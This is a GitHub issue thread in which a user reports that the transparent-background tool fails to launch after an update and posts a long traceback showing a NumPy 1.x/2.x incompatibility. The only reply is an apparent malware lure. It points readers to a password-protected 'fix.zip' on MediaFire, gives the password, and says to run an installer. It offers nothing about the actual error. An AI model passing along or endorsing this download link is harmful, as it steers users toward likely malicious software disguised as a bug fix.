### ISSUE TITLE
Stopped working with the new update

### ISSUE THREAD

**Issue by nitinmukesh** [plemeri/transparent-background#76]
It used to work fine but with new update it fails to launch

```
C:\usable\transparent-background>REM Change to the directory of the batch file

C:\usable\transparent-background>cd /d "C:\usable\transparent-background\"

C:\usable\transparent-background>REM Activate the virtual environment

C:\usable\transparent-background>call venv\scripts\activate

A module that was compiled using NumPy 1.x cannot be run in
NumPy 2.1.0 as it may crash. To support both 1.x and 2.x
versions of NumPy, modules must be compiled with NumPy 2.0.
Some module may need to rebuild instead e.g. with 'pybind11>=2.12'.

If you are a user of the module, the easiest solution will be to
downgrade to 'numpy<2' or try to upgrade the affected module.
We expect that some modules will need time to support NumPy 2.

Traceback (most recent call last):  File "C:\Program Files\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Program Files\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\usable\transparent-background\venv\Scripts\transparent-background-gui.exe\__main__.py", line 4, in <module>
    from transparent_background import gui
  File "C:\usable\transparent-background\venv\lib\site-packages\transparent_background\__init__.py", line 1, in <module>
    from transparent_background.Remover import Remover, console
  File "C:\usable\transparent-background\venv\lib\site-packages\transparent_background\Remover.py", line 14, in <module>
    import torchvision.transforms as transforms
  File "C:\usable\transparent-background\venv\lib\site-packages\torchvision\__init__.py", line 6, in <module>
    from torchvision import _meta_registrations, datasets, io, models, ops, transforms, utils
  File "C:\usable\transparent-background\venv\lib\site-packages\torchvision\models\__init__.py", line 2, in <module>
    from .convnext import *
  File "C:\usable\transparent-background\venv\lib\site-packages\torchvision\models\convnext.py", line 8, in <module>
    from ..ops.misc import Conv2dNormActivation, Permute
  File "C:\usable\transparent-background\venv\lib\site-packages\torchvision\ops\__init__.py", line 23, in <module>
    from .poolers import MultiScaleRoIAlign
  File "C:\usable\transparent-background\venv\lib\site-packages\torchvision\ops\poolers.py", line 10, in <module>
    from .roi_align import roi_align
  File "C:\usable\transparent-background\venv\lib\site-packages\torchvision\ops\roi_align.py", line 4, in <module>
    import torch._dynamo
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\__init__.py", line 64, in <module>
    torch.manual_seed = disable(torch.manual_seed)
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\decorators.py", line 50, in disable
    return DisableContext()(fn)
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\eval_frame.py", line 410, in __call__
    (filename is None or trace_rules.check(fn))
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\trace_rules.py", line 3378, in check
    return check_verbose(obj, is_inlined_call).skipped
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\trace_rules.py", line 3361, in check_verbose
    rule = torch._dynamo.trace_rules.lookup_inner(
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\trace_rules.py", line 3442, in lookup_inner
    rule = get_torch_obj_rule_map().get(obj, None)
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\trace_rules.py", line 2782, in get_torch_obj_rule_map
    obj = load_object(k)
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\trace_rules.py", line 2811, in load_object
    val = _load_obj_from_str(x[0])
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\_dynamo\trace_rules.py", line 2795, in _load_obj_from_str
    return getattr(importlib.import_module(module), obj_name)
  File "C:\Program Files\Python310\lib\importlib\__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "C:\usable\transparent-background\venv\lib\site-packages\torch\nested\_internal\nested_tensor.py", line 417, in <module>
    values=torch.randn(3, 3, device="meta"),
C:\usable\transparent-background\venv\lib\site-packages\torch\nested\_internal\nested_tensor.py:417: UserWarning: Failed to initialize NumPy: _ARRAY_API not found (Triggered internally at ..\torch\csrc\utils\tensor_numpy.cpp:84.)
  values=torch.randn(3, 3, device="meta"),
C:\usable\transparent-background\venv\lib\site-packages\torch\functional.py:512: UserWarning: torch.meshgrid: in an upcoming release, it will be required to pass the indexing argument. (Triggered internally at ..\aten\src\ATen\native\TensorShape.cpp:3588.)
  return _VF.meshgrid(tensors, **kwargs)  # type: ignore[attr-defined]
Unhandled error processing page session : Traceback (most recent call last):
  File "C:\usable\transparent-background\venv\lib\site-packages\flet_runtime\app.py", line 244, in on_session_created
    await asyncio.get_running_loop().run_in_executor(
  File "C:\Program Files\Python310\lib\concurrent\futures\thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
  File "C:\usable\transparent-background\venv\lib\site-packages\transparent_background\gui.py", line 159, in main
    Remover() # init once
  File "C:\usable\transparent-background\venv\lib\site-packages\transparent_background\Remover.py", line 94, in __init__
    self.model = InSPyReNet_SwinB(depth=64, pretrained=False, threshold=None, **self.meta)
  File "C:\usable\transparent-background\venv\lib\site-packages\transparent_background\InSPyReNet.py", line 152, in InSPyReNet_SwinB
    return InSPyReNet(SwinB(pretrained=pretrained), [128, 128, 256, 512, 1024], depth, base_size, **kwargs)
  File "C:\usable\transparent-background\venv\lib\site-packages\transparent_background\InSPyReNet.py", line 46, in __init__
    self.transition0 = Transition(17)
  File "C:\usable\transparent-background\venv\lib\site-packages\transparent_background\modules\layers.py", line 65, in __init__
    self.kernel = torch.tensor(cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (k, k))).float()
RuntimeError: Could not infer dtype of numpy.uint8
```

![image](https://github.com/user-attachments/assets/1c68fc18-ec03-4d3f-8095-b338ba2b945c)

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
